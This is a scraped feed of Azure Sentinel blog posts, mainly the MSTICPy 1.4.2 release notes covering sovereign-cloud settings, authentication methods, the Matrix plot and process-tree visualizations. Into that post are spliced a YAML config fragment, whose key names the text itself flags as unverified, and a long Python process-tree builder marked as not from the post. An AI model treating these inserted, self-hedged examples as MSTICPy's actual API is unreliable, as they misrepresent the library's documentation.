Sentinel</SPAN></SPAN></SPAN></A><SPAN class="EOP SCXW39567267 BCX8" data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="12" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" 
rel="noopener"><SPAN data-contrast="none">MSTIC Jupyter and Python Security Tools</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="12" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN>Run and initialize the Getting Started Guide notebook</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="12" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Configure the Getting Started Guide notebook</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI><A href="#" target="_blank" rel="noopener nofollow noreferrer">Azure Sentinel Weekly Newsletter</A></LI> </UL> <P><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> Tue, 05 Oct 2021 11:57:16 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-2-getting-started-with-azure/ba-p/2716661 rodtrent 2021-10-05T11:57:16Z Azure Sentinel Notebooks - Azure cloud support, new visualizations https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-azure-cloud-support-new-visualizations/ba-p/2751268 <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The 1.4.2 release of MSTICPy includes three major features/updates:</P> <UL class="postList"> <LI class="graf graf--li">Support for Azure sovereign clouds for Azure Sentinel, Key Vault, Azure APIs, Azure Resource Graph and Azure Sentinel APIs</LI> 
<LI class="graf graf--li">A new visualization — the Matrix plot</LI> <LI class="graf graf--li">Significant update to the Process Tree visualization allowing you to use process data from Microsoft Defender for Endpoint, and generic process data from other sources.</LI> </UL> <P class="graf graf--p">We have also consolidated our visualizations into a single <EM>pandas</EM> accessor to make them easier to invoke from any DataFrame.</P> <P class="graf graf--p">&nbsp;</P> <H4 class="graf graf--h4">Important Note:</H4> <P class="graf graf--p">If you’ve installed <STRONG class="markup--strong markup--p-strong">release 1.4.0</STRONG> or <STRONG>1.4.1</STRONG>&nbsp;of MSTICPy, please upgrade to <STRONG class="markup--strong markup--p-strong">v1.4.3</STRONG> or later— a lot of the functionality described below didn’t make it into the 1.4.0 release due to a publisher (i.e. me) error!</P> <P class="graf graf--p">&nbsp;</P> <H2 class="graf graf--h3">Azure sovereign cloud&nbsp;support</H2> <P class="graf graf--p">What is an Azure sovereign cloud? Unless you are using one, you may not know. Most Azure customers use the Azure <EM class="markup--em markup--p-em">global </EM>cloud — this includes the public portal and Azure APIs typically located in the&nbsp;<EM class="markup--em markup--p-em">.azure.com</EM> domain namespace. However, there are a set of independent clouds with their own authentication, storage and other infrastructure — these may be used where there is a strict data residency requirement like that of Germany. 
Currently supported Azure clouds are:</P> <UL class="postList"> <LI class="graf graf--li">global — the Azure public cloud</LI> <LI class="graf graf--li">cn — China</LI> <LI class="graf graf--li">de — Germany</LI> <LI class="graf graf--li">usgov — US Government</LI> </UL> <P class="graf graf--p">I wasn’t able to find a single document that describes Azure sovereign clouds but this overview of the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">US Government cloud</A> will give you a reasonable understanding.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">For systems accessing a sovereign cloud it’s critical that they use a consistent set of endpoints to authenticate and access resources belonging to that cloud.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The updates to MSTICPy allow you to specify the cloud that you’re using in your&nbsp;<CODE class="markup--code markup--p-code">msticpyconfig.yaml</CODE> file. 
Once this is done, all of the Azure components used by MSTICPy will select the correct endpoints for authentication, resource management and API use.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">To set the correct cloud for your organization, run the MpConfigEdit configuration editor and select the <STRONG class="markup--strong markup--p-strong">Azure</STRONG> tab.</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">from msticpy import MpConfigEdit<BR />mp_conf = MpConfigEdit()<BR />mp_conf</PRE> <FIGURE class="graf graf--figure"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ianhelle_0-1631669321123.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310466i32195B05442B8516/image-size/large?v=v2&amp;px=999" role="button" title="ianhelle_0-1631669321123.png" alt="Azure configuration in MSTICPy Configuration editor" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure configuration in MSTICPy Configuration editor</span></span> <P>&nbsp;</P> </FIGURE> <P class="graf graf--p">The top half of the tab lets you select from the global, China (cn), Germany (de) and US government (usgov) clouds. 
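The same settings written by hand into msticpyconfig.yaml, as an added example that is not from the post. The key names (Azure, cloud, auth_methods) follow the Azure section of the MSTICPy settings documentation as I recall it, so verify them against the version you run; the cloud value is one of the four the editor tab offers, and auth_methods lists the authentication methods described further down, in the order they are tried:

```yaml
# Fragment of msticpyconfig.yaml (added example; verify key names against your MSTICPy version)
Azure:
  cloud: "usgov"          # one of: global, cn, de, usgov
  auth_methods:           # credential types tried in this order
    - cli                 # reuse an existing `az login` session on the Jupyter server
    - interactive         # otherwise fall back to a browser logon
```

After saving the file, reload it in the running kernel with the refresh_config() call the post shows, so that every Azure component picks up the new endpoints and credential order.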
The lower half lets you select the default authentication methods for Azure (see below).</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">After you save the settings (you need to hit the <STRONG>Save</STRONG> button to confirm your choices, then the&nbsp;<STRONG class="markup--strong markup--p-strong">Save Settings</STRONG> button to write the settings to your configuration file), you can reload the settings and start using them.</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">import msticpy<BR />msticpy.settings.refresh_config()</PRE> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Unfortunately, there isn’t anything very spectacular to see with this feature — other than for people using sovereign clouds (in which case, the MSTICPy Azure functions will begin working as they do for global cloud users).</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The MSTICPy components affected by this are:</P> <UL class="postList"> <LI class="graf graf--li">Azure Sentinel data provider (and the underlying Kqlmagic library)</LI> <LI class="graf graf--li">Azure Key Vault for secret storage</LI> <LI class="graf graf--li">Azure Data provider</LI> <LI class="graf graf--li">Azure Sentinel APIs</LI> <LI class="graf graf--li">Azure Resource graph provider</LI> </UL> <P>&nbsp;</P> <H3 class="graf graf--h4">Azure default authentication methods</H3> <P class="graf graf--p">In the same Azure settings tab, you can also specify the default authentication methods that you want to use. MSTICPy uses <EM class="markup--em markup--p-em">ChainedCredential</EM> authentication, allowing a sequence of different authentication methods to be tried in turn. 
The available methods are:</P> <UL class="postList"> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">env</STRONG> — Use credentials set in environment variables</LI> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">cli</STRONG> — Use credentials from a local Azure CLI logon</LI> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">msi</STRONG> — Use the Managed Service Identity (MSI) credentials of the machine running the notebook kernel</LI> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">interactive</STRONG> — Interactive browser logon</LI> </UL> <P class="graf graf--p">You can select one or more of these, which gives you more flexibility when signing in. For example, if you have <STRONG class="markup--strong markup--p-strong">cli </STRONG>and <STRONG class="markup--strong markup--p-strong">interactive </STRONG>enabled, MSTICPy will try to obtain an access token via an existing Azure CLI session, if there is one, and otherwise fall back to interactive browser logon.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The first three methods refer to credentials available on the Jupyter server (e.g., an Azure ML Compute instance) and not necessarily on the machine on which your browser is running. For example, if you want to use Azure CLI credentials you must run <CODE class="markup--code markup--p-code">az login</CODE> on the Jupyter server, not on the machine you are browsing from.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Note: MSI authentication is not currently supported on AML compute.</P> <P class="graf graf--p">&nbsp;</P> <H3 class="graf graf--h4">Using Azure CLI as your default login&nbsp;method</H3> <P class="graf graf--p">As a side note to this, using an Azure CLI logon gives you many benefits, particularly when running multiple notebooks. 
Rather than have to authenticate for each notebook, the ChainedCredential flow will try to obtain an access token via the CLI session, giving you an effective single sign-on mechanism.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Due to its ability to cache credentials, we strongly recommend using Azure CLI logon. This allows all MSTICPy Azure functions to try to obtain current credentials from Azure CLI rather than initiate a new interactive authentication. This is especially helpful when using multiple Azure components or when running multiple notebooks. We recommend selecting <STRONG class="markup--strong markup--p-strong">cli </STRONG>and <STRONG class="markup--strong markup--p-strong">interactive </STRONG>for most cases.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">To log in using Azure CLI from a notebook enter the following in a cell and run it:</P> <PRE class="graf graf--pre">!az login</PRE> <P class="graf graf--p graf--empty">&nbsp;</P> <P class="graf graf--p">You can read more about the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">Azure cloud and Azure authentication settings</A> in the MSTICPy documentation. If you have any requirements for cloud support not listed here please file an issue on our GitHub repo.</P> <P class="graf graf--p">&nbsp;</P> <H2 class="graf graf--h3">Matrix Plot</H2> <P class="graf graf--p">This is a new visualization for MSTICPy. 
It uses the Bokeh plotting library, which brings with it all of the interactivity common to our other visualizations.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">We are indebted to Myriam and her <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">CatScatter</A> article on <EM>Towards Data Science</EM> for the inspiration for this visualization.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The Matrix plot is designed to be used where you want to see interactions between two sets of data — either to see whether there was any interaction at all, or get a sense of how much (or how little) interaction there was.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">A canonical example would be to view connections between sets of IP addresses. This is shown in the following screen shot where the size of each circle at the grid intersections is proportional to the number of connections recorded.</P> <P class="graf graf--p">&nbsp;</P> <FIGURE class="graf graf--figure"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ianhelle_1-1631669321191.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310467i49195585F1D4B1CB/image-size/large?v=v2&amp;px=999" role="button" title="ianhelle_1-1631669321191.png" alt="Matrix plot of communications between source and destination IP Addresses" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Matrix plot of communications between source and destination IP Addresses</span></span> <P>&nbsp;</P> <FIGCAPTION class="imageCaption"></FIGCAPTION> </FIGURE> <P class="graf graf--p">The syntax for creating a matrix plot is straightforward. Once you’ve loaded MSTICPy you can plot directly from a pandas DataFrame. 
You need to specify the “x” parameter (the horizontal axis) and the “y” parameter (the vertical axis).</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">net_df.mp_plot.matrix(<BR /> x="SourceIP",<BR /> y="DestinationIP",<BR /> title="IP Interaction"<BR />)</PRE> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">By default, the circle size at the intersection of the x and y values is the number of interactions (i.e., the number of rows in the source data where the distinct x and y pairs appear).</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">There are several variations of the basic plot:</P> <UL class="postList"> <LI class="graf graf--li">Use a column in the input DataFrame to size the intersection circle, rather than a raw count (using the <CODE class="markup--code markup--li-code">value_col=column_name</CODE> parameter). The column must be numeric (an integer or float), for example, BytesTransmitted.</LI> <LI class="graf graf--li">Scale the sizing (using <CODE class="markup--code markup--li-code">log_size=True</CODE>). This is useful to “flatten” the variations between different count values where these values are skewed.</LI> <LI class="graf graf--li">Invert the sizing. This plots the inverse of the interaction point value. It is particularly useful to highlight rare, rather than common, interactions (using <CODE class="markup--code markup--li-code">invert=True</CODE>).</LI> <LI class="graf graf--li">Plot circle size using a count of distinct values for a named column (using <CODE class="markup--code markup--li-code">dist_count=column_name</CODE>). The <EM class="markup--em markup--li-em">column_name </EM>column can be of any data type.</LI> <LI class="graf graf--li">Ignore sizing and plot a fixed-sized circle for any interaction between the x and y pairs. 
This is useful to be able to quickly see all interactions — using the default scaled circle size can result in some interaction points being very small and difficult to see.</LI> </UL> <P class="graf graf--p">The x and y columns don’t have to be interacting entities such as IP addresses or hosts. Either axis can be an arbitrary column from the source DataFrame. For example, you could plot <EM class="markup--em markup--p-em">Account</EM> on the y axis and <EM class="markup--em markup--p-em">ResourceIdentifier</EM> on the x axis to show how often a particular account accesses a resource.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">There are a few more options controlling font sizes, the title, and axis sorting. You can read more in our online documentation describing the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">Matrix plot</A> in detail.</P> <P class="graf graf--p">&nbsp;</P> <H2 class="graf graf--h3">Process Tree Visualization</H2> <P class="graf graf--p">The <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">process tree visualization</A> has been in MSTICPy for a while, but it was closely bound to the Azure Sentinel data schema. We’ve reworked the process tree plotting and support libraries to be data source agnostic. We’ve also built specific support for MS Defender for Endpoint (MDE) process logs.</P> <P class="graf graf--p">&nbsp;</P> <H3 class="graf graf--h4">Making the process tree schema-agnostic</H3> <P class="graf graf--p">We’ve removed hard-coded references to columns such as <EM class="markup--em markup--p-em">TenantId </EM>and <EM class="markup--em markup--p-em">TimeGenerated</EM>. For your data source, you need to create a dictionary that maps the following generic property names (<EM class="markup--em markup--p-em">InternalName </EM>column) to the columns in your data (<EM class="markup--em markup--p-em">DataSourceName</EM>). 
You can also use the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">ProcSchema</A> class to define your column mapping.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The example below shows the mapping for Linux auditd data read from Azure Sentinel.</P> <FIGURE class="graf graf--figure graf--iframe"> <DIV class="aspectRatioPlaceholder is-locked"> <DIV class="iframeContainer"> <TABLE style="height: 555px; border-style: solid; width: 100%;" border="1" width="100%"><CAPTION>&nbsp;</CAPTION> <TBODY> <TR> <TD width="12.5%" height="30px"><STRONG>InternalName</STRONG></TD> <TD width="12.5%" height="30px"><STRONG>Description</STRONG></TD> <TD width="25%" height="30px"><STRONG>DataSourceName</STRONG></TD> <TD width="25%" height="30px"><STRONG>Required</STRONG></TD> </TR> <TR> <TD width="12.5%" height="57px">process_name</TD> <TD width="12.5%" height="57px">Name/path of the created process</TD> <TD width="25%" height="57px">exe</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">process_id</TD> <TD width="12.5%" height="30px">Process ID</TD> <TD width="25%" height="30px">pid</TD> <TD width="25%" height="30px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">parent_id</TD> <TD width="12.5%" height="30px">Parent process ID</TD> <TD width="25%" height="30px">ppid</TD> <TD width="25%" height="30px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">logon_id</TD> <TD width="12.5%" height="30px">Logon/session ID</TD> <TD width="25%" height="30px">ses</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="57px">cmd_line</TD> <TD width="12.5%" height="57px">Process command line</TD> <TD width="25%" height="57px">cmdline</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="57px">user_name</TD> <TD width="12.5%" height="57px">Process account name</TD> <TD width="25%" height="57px">acct</TD> <TD width="25%" height="57px">Yes</TD> 
</TR> <TR> <TD width="12.5%" height="30px">path_separator</TD> <TD width="12.5%" height="30px">"\\" or "/"</TD> <TD width="25%" height="30px">"/"</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="57px">host_name_column</TD> <TD width="12.5%" height="57px">Host running process</TD> <TD width="25%" height="57px">Computer</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">time_stamp</TD> <TD width="12.5%" height="30px">Process create time</TD> <TD width="25%" height="30px">TimeGenerated</TD> <TD width="25%" height="30px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">parent_name</TD> <TD width="12.5%" height="30px">Parent name/path</TD> <TD width="25%" height="30px">&nbsp;</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="57px">target_logon_id</TD> <TD width="12.5%" height="57px">Effective logon/session ID</TD> <TD width="25%" height="57px">&nbsp;</TD> <TD width="25%" height="57px">No</TD> </TR> <TR> <TD width="12.5%" height="30px">user_id</TD> <TD width="12.5%" height="30px">ID/SID of account</TD> <TD width="25%" height="30px">uid</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="30px">event_id_column</TD> <TD width="12.5%" height="30px">Column in input data that identifies the event type (only needed if mixed events in data)</TD> <TD width="25%" height="30px">EventType</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%">event_id_identifier</TD> <TD width="12.5%">The value of event_id_column to use to filter only required events</TD> <TD width="25%">SYSCALL_EXECVE</TD> <TD width="25%">No</TD> </TR> </TBODY> </TABLE> </DIV> </DIV> <FIGCAPTION class="imageCaption"><BR />And here is an example of how to define a schema for your input data.<BR /><BR /></FIGCAPTION> </FIGURE> <PRE class="graf graf--pre">from msticpy.sectools.proc_tree_builder import ProcSchema<BR />my_schema = ProcSchema(<BR /> 
 time_stamp="TimeGenerated",<BR /> process_name="exe",<BR /> process_id="pid",<BR /> ...<BR /> path_separator="/",<BR /> user_id="uid",<BR /> host_name_column="Computer",<BR />)<BR />lx_proc_df.mp_plot.process_tree(schema=my_schema)</PRE> <H3 class="graf graf--h4">Using MDE process&nbsp;data</H3> <P class="graf graf--p">MDE process data contains groups of data for each process row:</P> <UL class="postList"> <LI class="graf graf--li">CreatedProcess attributes</LI> <LI class="graf graf--li">InitiatingProcess attributes (the parent of the CreatedProcess)</LI> <LI class="graf graf--li">InitiatingProcessParent attributes (the grandparent of the CreatedProcess)</LI> </UL> <P class="graf graf--p">The MSTICPy process tree builder flattens this structure into a single process per row (with attributes) and adds a key that links each process to its parent process. In some cases, rows for the parent and grandparent processes are already in the input data set. Where these are missing, MSTICPy will infer these records from the <EM class="markup--em markup--p-em">InitiatingProcess </EM>and <EM class="markup--em markup--p-em">InitiatingProcessParent </EM>data in the child process row. Once this is done, the process tree is displayed. 
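Both steps above (mapping a ProcSchema-style dictionary onto the columns of your data, and flattening MDE rows whose parent and grandparent records may be missing) are illustrated by the following added example. It is not MSTICPy's own implementation: the builder and flattener are written here from the description, the MDE column names (DeviceName, ProcessId, InitiatingProcessId, InitiatingProcessParentId and their FileName/CommandLine counterparts) are assumed from DeviceProcessEvents, and the sample rows are constructed.

```python
from __future__ import annotations

from dataclasses import dataclass, field

# ProcSchema-style mappings (internal name -> column). AUDITD_SCHEMA follows the auditd
# table above; FLAT_MDE_SCHEMA is for the rows flatten_mde() emits (names are this example's).
AUDITD_SCHEMA = {"process_name": "exe", "process_id": "pid", "parent_id": "ppid",
                 "cmd_line": "cmdline", "host_name_column": "Computer", "path_separator": "/"}
FLAT_MDE_SCHEMA = {"process_name": "name", "process_id": "pid", "parent_id": "ppid",
                   "cmd_line": "cmd", "host_name_column": "host", "path_separator": "\\"}


@dataclass
class ProcNode:
    key: str                 # "<host>|<pid>"; a production builder adds create time (PIDs are reused)
    name: str
    parent_key: str | None
    cmd_line: str = ""
    inferred: bool = False   # record reconstructed from a child's parent/grandparent fields
    children: list[ProcNode] = field(default_factory=list)


def build_tree(rows: list[dict], schema: dict) -> list[ProcNode]:
    """Link flat process rows into trees using a ProcSchema-style mapping. A parent that
    a row references but that is absent from the data becomes an inferred placeholder,
    so every process ends up under a root. Returns the roots."""
    host, sep = schema["host_name_column"], schema.get("path_separator", "/")
    nodes: dict[str, ProcNode] = {}
    for r in rows:
        key, ppid = f"{r[host]}|{r[schema['process_id']]}", r.get(schema["parent_id"])
        nodes[key] = ProcNode(key, str(r[schema["process_name"]]).split(sep)[-1],
                              f"{r[host]}|{ppid}" if ppid is not None else None,
                              r.get(schema.get("cmd_line"), "") or "",
                              bool(r.get("_inferred", False)))
    for node in list(nodes.values()):
        if node.parent_key and node.parent_key not in nodes:  # parent never logged
            nodes[node.parent_key] = ProcNode(node.parent_key, "<unknown>", None, inferred=True)
    for node in nodes.values():
        if node.parent_key:
            nodes[node.parent_key].children.append(node)
    return [n for n in nodes.values() if n.parent_key is None]


def flatten_mde(mde_rows: list[dict]) -> list[dict]:
    """Each MDE-style row carries CreatedProcess, InitiatingProcess (parent) and
    InitiatingProcessParent (grandparent) attribute groups. Emit one generic row per
    process; parent/grandparent rows are synthesised (marked _inferred) only when no
    real row for that process exists anywhere in the input."""
    real = {(r["DeviceName"], r["ProcessId"]) for r in mde_rows}
    flat: dict[tuple, dict] = {}
    for r in mde_rows:
        h = r["DeviceName"]
        flat[(h, r["ProcessId"])] = {"host": h, "pid": r["ProcessId"], "name": r["FileName"],
                                     "ppid": r["InitiatingProcessId"], "cmd": r["ProcessCommandLine"]}
        parent = (h, r["InitiatingProcessId"])
        if parent not in real:  # the row also tells us the parent's own parent
            flat[parent] = {"host": h, "pid": parent[1], "name": r["InitiatingProcessFileName"],
                            "ppid": r["InitiatingProcessParentId"],
                            "cmd": r["InitiatingProcessCommandLine"], "_inferred": True}
        grandparent = (h, r["InitiatingProcessParentId"])
        if grandparent not in real and grandparent not in flat:
            flat[grandparent] = {"host": h, "pid": grandparent[1], "ppid": None,  # nothing above it
                                 "name": r["InitiatingProcessParentFileName"], "cmd": "", "_inferred": True}
    return list(flat.values())


def render(roots: list[ProcNode], indent: int = 0) -> list[str]:
    """Indented text rendering of the trees; inferred records are flagged."""
    out = []
    for n in sorted(roots, key=lambda n: n.key):
        tag = " [inferred]" if n.inferred else ""
        out.append(f"{'  ' * indent}{n.name} ({n.key}){tag} {n.cmd_line}".rstrip())
        out.extend(render(n.children, indent + 1))
    return out


# Constructed rows in the shape of MDE DeviceProcessEvents (not real telemetry): only the
# two leaf processes were logged, so their parent and grandparent must be inferred.
MDE_SAMPLE = [
    {"DeviceName": "wks01", "ProcessId": 300, "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -File report.ps1",
     "InitiatingProcessId": 200, "InitiatingProcessFileName": "WINWORD.EXE",
     "InitiatingProcessCommandLine": "WINWORD.EXE /n invoice.docm",
     "InitiatingProcessParentId": 100, "InitiatingProcessParentFileName": "explorer.exe"},
    {"DeviceName": "wks01", "ProcessId": 400, "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c ipconfig",
     "InitiatingProcessId": 300, "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessCommandLine": "powershell.exe -File report.ps1",
     "InitiatingProcessParentId": 200, "InitiatingProcessParentFileName": "WINWORD.EXE"},
]
# Constructed auditd-style rows using the column names from the table above.
AUDITD_SAMPLE = [
    {"Computer": "lx01", "pid": 2001, "ppid": 1999, "exe": "/usr/bin/bash", "cmdline": "bash run.sh"},
    {"Computer": "lx01", "pid": 2002, "ppid": 2001, "exe": "/usr/bin/curl", "cmdline": "curl -sS localhost"},
]
if __name__ == "__main__":
    print("\n".join(render(build_tree(flatten_mde(MDE_SAMPLE), FLAT_MDE_SCHEMA))))
    print("\n".join(render(build_tree(AUDITD_SAMPLE, AUDITD_SCHEMA))))
```

The auditd tree gets a placeholder root because pid 1999 was never logged, while the MDE tree recovers WINWORD.EXE and explorer.exe with their attributes from the child rows.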
Some attributes are shown in the box for each process; more are available as “tooltips” as you hover over each process in the tree.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The process tree module will identify MDE data from the columns present: you do not need to define a schema.</P> <P class="graf graf--p">&nbsp;</P> <FIGURE class="graf graf--figure"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ianhelle_2-1631669321172.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310468iB968EA1B2F1C86E3/image-size/large?v=v2&amp;px=999" role="button" title="ianhelle_2-1631669321172.png" alt="Process tree for MS Defender for Endpoint&nbsp;data" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Process tree for MS Defender for Endpoint&nbsp;data</span></span> <P>&nbsp;</P> <FIGCAPTION class="imageCaption"></FIGCAPTION> </FIGURE> <P class="graf graf--h3">&nbsp;</P> <H2 class="graf graf--h3">Uniform access to plotting from pandas DataFrames</H2> <P class="graf graf--p">We’ve consolidated the various plotting functions into a single accessor named <CODE class="markup--code markup--p-code">mp_plot</CODE>. This lets you access any of the main MSTICPy visualization functions from a DataFrame. These are:</P> <UL class="postList"> <LI class="graf graf--li">Event Timeline — <CODE class="markup--code markup--li-code">timeline</CODE></LI> <LI class="graf graf--li">Event Timeline values — <CODE class="markup--code markup--li-code">timeline_values</CODE></LI> <LI class="graf graf--li">Process Tree — <CODE class="markup--code markup--li-code">process_tree</CODE></LI> <LI class="graf graf--li">Event Duration — <CODE class="markup--code markup--li-code">timeline_duration</CODE></LI> <LI class="graf graf--li">Matrix Plot — <CODE class="markup--code markup--li-code">matrix</CODE></LI> </UL> <P class="graf graf--p">The syntax for all of these is similar. 
The accessor is loaded automatically if you run <CODE class="markup--code markup--p-code">init_notebook</CODE>. You can also load it manually using the following code.</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">from msticpy.vis import mp_pandas_plot</PRE> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Here are some examples of usage:</P> <PRE class="graf graf--pre">df_mde.mp_plot.process_tree(legend_col="CreatedProcessAccountName")<BR /><BR />net_df.mp_plot.matrix(<BR /> x="SourceIP",<BR /> y="DestinationIP",<BR /> title="IP Interaction"<BR />)<BR /><BR />net_df.mp_plot.timeline(<BR /> source_columns=["SourceIP", "DestinationIP"],<BR /> title="IP Timeline"<BR />)</PRE> <P class="graf graf--h3">&nbsp;</P> <H2 class="graf graf--h3">Conclusion</H2> <P class="graf graf--p">You can read more details on our documentation pages using the links provided in this article.</P> <P class="graf graf--p">You can also read the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">release notes</A> for details of all of the other fixes and minor changes in this release.</P> <P class="graf graf--p">Please let us know about any issues or feature requests on our <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener ugc nofollow noopener" data-href="#">GitHub repo</A>. 
If you like the package, please add a star to the repo (it means a lot&nbsp;<img class="lia-deferred-image lia-image-emoji" src="https://techcommunity.microsoft.com/html/@8341BD79091AF36AA2A09063B554B5CDhttps://techcommunity.microsoft.com/images/emoticons/smile_40x40.gif" alt=":smile:" title=":smile:" />)</P> <P class="graf graf--p">Enjoy!</P> Wed, 22 Sep 2021 16:17:46 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-azure-cloud-support-new-visualizations/ba-p/2751268 ianhelle 2021-09-22T16:17:46Z Azure Sentinel Information Model Fall Release: Speed & Ease https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-information-model-fall-release-speed-amp-ease/ba-p/2749363 <P>Hello everyone,</P> <P>&nbsp;</P> <P>Last quarter we focused on Azure Sentinel Information Model (ASIM) foundations and defined schemas. This quarter we focused on making ASIM more useful to you:</P> <P>&nbsp;&nbsp;</P> <UL> <LI><STRONG>ASIM is now simpler and faster to deploy -</STRONG>&nbsp;you can now deploy all ASIM parsers in&nbsp;<A href="#" target="_blank" rel="noopener">a single, easy deploy</A>. And since it costs nothing, takes a minute, and, using query time technology, does not actually change your data, why not test drive? See the new&nbsp;<A href="#" target="_blank" rel="noopener">getting started guide</A>&nbsp;to get you going.</LI> </UL> <P>&nbsp;</P> <UL> <LI><STRONG>ASIM is now lightning fast -</STRONG>&nbsp;One of the concerns we keep hearing about ASIM is that using query time parsing can slow things down. To address this, we have designed&nbsp;<A href="#" target="_blank" rel="noopener">parametrized parsers</A>. Parametrized parsers let you pass filtering conditions to the parser itself, ensuring filtering precedes parsing, leading to a significant performance gain. 
In many cases, filtering using parser parameters will result in much better performance than using non-normalized data.&nbsp;</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">The first schema to use parametrized parsers is the&nbsp;<A href="#" target="_blank" rel="noopener">DNS schema</A>. DNS is a high-volume source, and using optimized parsers enables the new normalized Threat Intelligence Analytics Rules (<A href="#" target="_blank" rel="noopener">Domains</A>, <A href="#" target="_blank" rel="noopener">IPs</A>) to match your TI to even the highest volume of DNS data. And with out-of-the-box optimized parsers for a wide variety of DNS servers and clients, including Windows DNS Server, InfoBlox, Cisco Umbrella, Corelight Zeek, Google Cloud DNS, and Sysmon, you get this detection across much more of your data.&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">Join us to learn more about parametrized parsers in our <STRONG>upcoming webinar “Turbocharging ASIM: Making Sure Normalization Helps Performance Rather Than Impacting It”</STRONG> on Oct 6th. Register, as usual, on&nbsp;<A href="#" 